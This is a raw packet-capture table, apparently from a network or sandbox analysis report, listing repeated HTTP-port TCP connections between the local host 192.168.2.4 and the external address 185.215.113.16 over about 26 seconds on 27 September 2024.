Sep 27, 2024 00:22:54.654891014 CEST	80	49919	185.215.113.16	192.168.2.4
Sep 27, 2024 00:22:54.654963970 CEST	49919	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:22:54.657593966 CEST	49919	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:22:54.657910109 CEST	49920	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:22:54.664200068 CEST	80	49920	185.215.113.16	192.168.2.4
Sep 27, 2024 00:22:54.664262056 CEST	49920	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:22:54.664452076 CEST	80	49919	185.215.113.16	192.168.2.4
Sep 27, 2024 00:22:54.664457083 CEST	49920	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:22:54.664489985 CEST	49919	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:22:54.670782089 CEST	80	49920	185.215.113.16	192.168.2.4
Sep 27, 2024 00:22:55.387602091 CEST	80	49920	185.215.113.16	192.168.2.4
Sep 27, 2024 00:22:55.387659073 CEST	49920	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:22:55.492754936 CEST	49920	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:22:55.492983103 CEST	49921	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:22:55.501286983 CEST	80	49921	185.215.113.16	192.168.2.4
Sep 27, 2024 00:22:55.501358986 CEST	80	49920	185.215.113.16	192.168.2.4
Sep 27, 2024 00:22:55.501477003 CEST	49921	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:22:55.501485109 CEST	49920	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:22:55.501744986 CEST	49921	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:22:55.510593891 CEST	80	49921	185.215.113.16	192.168.2.4
Sep 27, 2024 00:22:56.221141100 CEST	80	49921	185.215.113.16	192.168.2.4
Sep 27, 2024 00:22:56.221404076 CEST	49921	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:22:56.223973989 CEST	49921	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:22:56.224329948 CEST	49922	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:22:56.229207993 CEST	80	49922	185.215.113.16	192.168.2.4
Sep 27, 2024 00:22:56.229468107 CEST	49922	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:22:56.229485035 CEST	80	49921	185.215.113.16	192.168.2.4
Sep 27, 2024 00:22:56.229592085 CEST	49921	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:22:56.229768038 CEST	49922	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:22:56.234571934 CEST	80	49922	185.215.113.16	192.168.2.4
Sep 27, 2024 00:22:56.945059061 CEST	80	49922	185.215.113.16	192.168.2.4
Sep 27, 2024 00:22:56.945103884 CEST	49922	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:22:57.056139946 CEST	49922	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:22:57.056577921 CEST	49923	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:22:57.062787056 CEST	80	49922	185.215.113.16	192.168.2.4
Sep 27, 2024 00:22:57.062843084 CEST	49922	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:22:57.062901974 CEST	80	49923	185.215.113.16	192.168.2.4
Sep 27, 2024 00:22:57.062982082 CEST	49923	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:22:57.063184023 CEST	49923	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:22:57.068538904 CEST	80	49923	185.215.113.16	192.168.2.4
Sep 27, 2024 00:22:57.773082972 CEST	80	49923	185.215.113.16	192.168.2.4
Sep 27, 2024 00:22:57.776907921 CEST	49923	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:22:57.779869080 CEST	49924	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:22:57.779872894 CEST	49923	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:22:57.787168026 CEST	80	49924	185.215.113.16	192.168.2.4
Sep 27, 2024 00:22:57.787354946 CEST	80	49923	185.215.113.16	192.168.2.4
Sep 27, 2024 00:22:57.787504911 CEST	49923	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:22:57.787507057 CEST	49924	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:22:57.787679911 CEST	49924	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:22:57.794819117 CEST	80	49924	185.215.113.16	192.168.2.4
Sep 27, 2024 00:22:58.520958900 CEST	80	49924	185.215.113.16	192.168.2.4
Sep 27, 2024 00:22:58.521030903 CEST	49924	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:22:58.679147959 CEST	49924	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:22:58.679423094 CEST	49925	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:22:58.703489065 CEST	80	49925	185.215.113.16	192.168.2.4
Sep 27, 2024 00:22:58.703505039 CEST	80	49924	185.215.113.16	192.168.2.4
Sep 27, 2024 00:22:58.703567982 CEST	49925	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:22:58.703630924 CEST	49924	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:22:58.710017920 CEST	49925	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:22:58.714919090 CEST	80	49925	185.215.113.16	192.168.2.4
Sep 27, 2024 00:22:59.421364069 CEST	80	49925	185.215.113.16	192.168.2.4
Sep 27, 2024 00:22:59.421422005 CEST	49925	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:22:59.425308943 CEST	49925	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:22:59.425777912 CEST	49926	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:22:59.434237003 CEST	80	49925	185.215.113.16	192.168.2.4
Sep 27, 2024 00:22:59.434252024 CEST	80	49926	185.215.113.16	192.168.2.4
Sep 27, 2024 00:22:59.434288025 CEST	49925	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:22:59.434345961 CEST	49926	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:22:59.434643984 CEST	49926	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:22:59.441397905 CEST	80	49926	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:00.144217968 CEST	80	49926	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:00.146949053 CEST	49926	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:00.258326054 CEST	49926	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:00.258825064 CEST	49927	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:00.266267061 CEST	80	49927	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:00.266365051 CEST	49927	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:00.266506910 CEST	80	49926	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:00.266532898 CEST	49927	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:00.266793013 CEST	49926	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:00.274753094 CEST	80	49927	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:01.037763119 CEST	80	49927	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:01.037822962 CEST	49927	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:01.085697889 CEST	49927	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:01.086169958 CEST	49928	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:01.093103886 CEST	80	49928	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:01.093163013 CEST	49928	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:01.093364954 CEST	80	49927	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:01.093416929 CEST	49927	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:01.098036051 CEST	49928	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:01.105369091 CEST	80	49928	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:01.822257042 CEST	80	49928	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:01.822642088 CEST	49928	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:01.931094885 CEST	49928	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:01.931436062 CEST	49929	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:01.937768936 CEST	80	49929	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:01.937927961 CEST	49929	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:01.938055038 CEST	80	49928	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:01.938169003 CEST	49929	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:01.938292027 CEST	49928	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:01.945854902 CEST	80	49929	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:02.651928902 CEST	80	49929	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:02.652018070 CEST	49929	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:02.697928905 CEST	49929	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:02.698215008 CEST	49930	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:02.703082085 CEST	80	49929	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:02.703216076 CEST	80	49930	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:02.703270912 CEST	49929	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:02.703306913 CEST	49930	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:02.708338976 CEST	49930	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:02.713406086 CEST	80	49930	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:03.408562899 CEST	80	49930	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:03.408663988 CEST	49930	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:03.525755882 CEST	49930	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:03.526082039 CEST	49931	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:03.530893087 CEST	80	49931	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:03.530936003 CEST	80	49930	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:03.530951023 CEST	49931	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:03.530988932 CEST	49930	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:03.531213045 CEST	49931	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:03.535939932 CEST	80	49931	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:04.237663984 CEST	80	49931	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:04.237859964 CEST	49931	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:04.242872953 CEST	49931	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:04.243163109 CEST	49932	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:04.249439955 CEST	80	49932	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:04.249526024 CEST	80	49931	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:04.249564886 CEST	49931	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:04.249584913 CEST	49932	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:04.249908924 CEST	49932	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:04.256762028 CEST	80	49932	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:05.021758080 CEST	80	49932	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:05.021830082 CEST	49932	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:05.135453939 CEST	49932	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:05.135956049 CEST	49933	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:05.141727924 CEST	80	49932	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:05.141781092 CEST	49932	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:05.142193079 CEST	80	49933	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:05.142261982 CEST	49933	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:05.142704964 CEST	49933	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:05.148207903 CEST	80	49933	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:05.836529016 CEST	80	49933	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:05.840205908 CEST	49933	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:05.843285084 CEST	49933	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:05.843285084 CEST	49934	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:05.850044012 CEST	80	49934	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:05.850893974 CEST	49934	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:05.850912094 CEST	80	49933	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:05.851646900 CEST	49934	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:05.851752043 CEST	49933	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:05.858340025 CEST	80	49934	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:06.598233938 CEST	80	49934	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:06.598299980 CEST	49934	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:06.711972952 CEST	49934	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:06.712331057 CEST	49935	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:06.717370033 CEST	80	49935	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:06.717442036 CEST	49935	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:06.717629910 CEST	49935	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:06.717796087 CEST	80	49934	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:06.717843056 CEST	49934	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:06.722522020 CEST	80	49935	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:07.421797037 CEST	80	49935	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:07.421854973 CEST	49935	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:07.424772978 CEST	49935	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:07.425139904 CEST	49936	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:07.431976080 CEST	80	49936	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:07.432053089 CEST	49936	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:07.432442904 CEST	49936	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:07.432451963 CEST	80	49935	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:07.432533979 CEST	49935	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:07.437333107 CEST	80	49936	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:08.149193048 CEST	80	49936	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:08.149557114 CEST	49936	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:08.264944077 CEST	49936	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:08.266022921 CEST	49937	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:08.272202015 CEST	80	49936	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:08.272349119 CEST	49936	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:08.272646904 CEST	80	49937	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:08.272825003 CEST	49937	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:08.273190975 CEST	49937	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:08.280167103 CEST	80	49937	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:08.999195099 CEST	80	49937	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:08.999294996 CEST	49937	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:09.002207041 CEST	49937	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:09.002562046 CEST	49938	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:09.007514954 CEST	80	49937	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:09.007580042 CEST	49937	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:09.007816076 CEST	80	49938	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:09.007888079 CEST	49938	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:09.008095980 CEST	49938	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:09.013075113 CEST	80	49938	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:09.068525076 CEST	49938	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:09.181027889 CEST	49939	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:09.186146975 CEST	80	49939	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:09.186223030 CEST	49939	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:09.186744928 CEST	49939	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:09.191627979 CEST	80	49939	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:09.896266937 CEST	80	49939	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:09.896383047 CEST	49939	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:09.898897886 CEST	49939	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:09.899418116 CEST	49940	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:09.904418945 CEST	80	49939	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:09.904551029 CEST	49939	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:09.904604912 CEST	80	49940	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:09.904695034 CEST	49940	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:09.904930115 CEST	49940	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:09.909806013 CEST	80	49940	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:10.656774044 CEST	80	49940	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:10.656835079 CEST	49940	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:10.775276899 CEST	49940	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:10.775676966 CEST	49941	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:10.780472040 CEST	80	49940	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:10.780522108 CEST	49940	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:10.780621052 CEST	80	49941	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:10.780700922 CEST	49941	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:10.780930996 CEST	49941	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:10.785729885 CEST	80	49941	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:11.494585991 CEST	80	49941	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:11.494654894 CEST	49941	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:11.498132944 CEST	49941	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:11.498493910 CEST	49942	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:11.503310919 CEST	80	49941	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:11.503325939 CEST	80	49942	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:11.503510952 CEST	49941	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:11.503510952 CEST	49942	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:11.503684998 CEST	49942	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:11.508775949 CEST	80	49942	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:12.195723057 CEST	80	49942	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:12.195883989 CEST	49942	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:12.305653095 CEST	49942	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:12.306107998 CEST	49943	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:12.310973883 CEST	80	49943	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:12.311110020 CEST	49943	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:12.311213017 CEST	49943	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:12.311450958 CEST	80	49942	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:12.315469027 CEST	49942	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:12.316062927 CEST	80	49943	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:13.045766115 CEST	80	49943	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:13.045830965 CEST	49943	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:13.062848091 CEST	49943	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:13.063179016 CEST	49944	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:13.068233967 CEST	80	49943	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:13.068273067 CEST	80	49944	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:13.068382025 CEST	49944	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:13.068418980 CEST	49943	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:13.068695068 CEST	49944	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:13.073577881 CEST	80	49944	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:14.016302109 CEST	80	49944	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:14.016448021 CEST	49944	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:14.022819042 CEST	80	49944	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:14.023093939 CEST	49944	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:14.133348942 CEST	49944	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:14.133781910 CEST	49945	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:14.140084028 CEST	80	49944	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:14.140192986 CEST	49944	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:14.140419006 CEST	80	49945	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:14.140837908 CEST	49945	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:14.141031027 CEST	49945	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:14.147458076 CEST	80	49945	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:14.869147062 CEST	80	49945	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:14.869240046 CEST	49945	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:14.873347044 CEST	49945	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:14.873709917 CEST	49946	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:14.878839970 CEST	80	49946	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:14.878911018 CEST	49946	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:14.879034042 CEST	80	49945	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:14.879061937 CEST	49946	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:14.879086971 CEST	49945	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:14.886749029 CEST	80	49946	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:15.604021072 CEST	80	49946	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:15.607065916 CEST	49946	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:15.711158991 CEST	49946	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:15.714926004 CEST	49947	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:15.718087912 CEST	80	49946	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:15.719000101 CEST	49946	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:15.721399069 CEST	80	49947	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:15.723293066 CEST	49947	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:15.723443985 CEST	49947	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:15.730166912 CEST	80	49947	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:16.461047888 CEST	80	49947	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:16.462928057 CEST	49947	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:16.465733051 CEST	49947	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:16.465734959 CEST	49948	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:16.472726107 CEST	80	49948	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:16.473119020 CEST	80	49947	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:16.475003958 CEST	49947	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:16.475022078 CEST	49948	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:16.475147009 CEST	49948	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:16.482666969 CEST	80	49948	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:17.187172890 CEST	80	49948	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:17.187241077 CEST	49948	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:17.306114912 CEST	49948	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:17.306525946 CEST	49949	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:17.311734915 CEST	80	49948	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:17.311810970 CEST	80	49949	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:17.311841965 CEST	49948	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:17.311887026 CEST	49949	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:17.312016964 CEST	49949	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:17.317433119 CEST	80	49949	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:18.011571884 CEST	80	49949	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:18.011818886 CEST	49949	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:18.014719009 CEST	49949	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:18.015120983 CEST	49950	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:18.021266937 CEST	80	49949	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:18.021497011 CEST	49949	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:18.021596909 CEST	80	49950	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:18.022929907 CEST	49950	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:18.028778076 CEST	49950	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:18.035466909 CEST	80	49950	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:18.728286028 CEST	80	49950	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:18.728375912 CEST	49950	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:18.837583065 CEST	49950	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:18.837985992 CEST	49951	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:18.845014095 CEST	80	49950	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:18.845071077 CEST	49950	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:18.845299959 CEST	80	49951	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:18.845370054 CEST	49951	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:18.845613003 CEST	49951	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:18.851793051 CEST	80	49951	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:19.556139946 CEST	80	49951	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:19.556942940 CEST	49951	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:19.596326113 CEST	49951	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:19.596766949 CEST	49952	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:19.603960037 CEST	80	49952	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:19.604274035 CEST	80	49951	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:19.604422092 CEST	49951	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:19.604422092 CEST	49952	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:19.608777046 CEST	49952	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:19.616214991 CEST	80	49952	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:20.342411041 CEST	80	49952	185.215.113.16	192.168.2.4
Sep 27, 2024 00:23:20.342576027 CEST	49952	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:20.446799994 CEST	49952	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:20.447047949 CEST	49953	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:23:20.451982021 CEST	80	49953	185.215.113.16	192.168.2.4
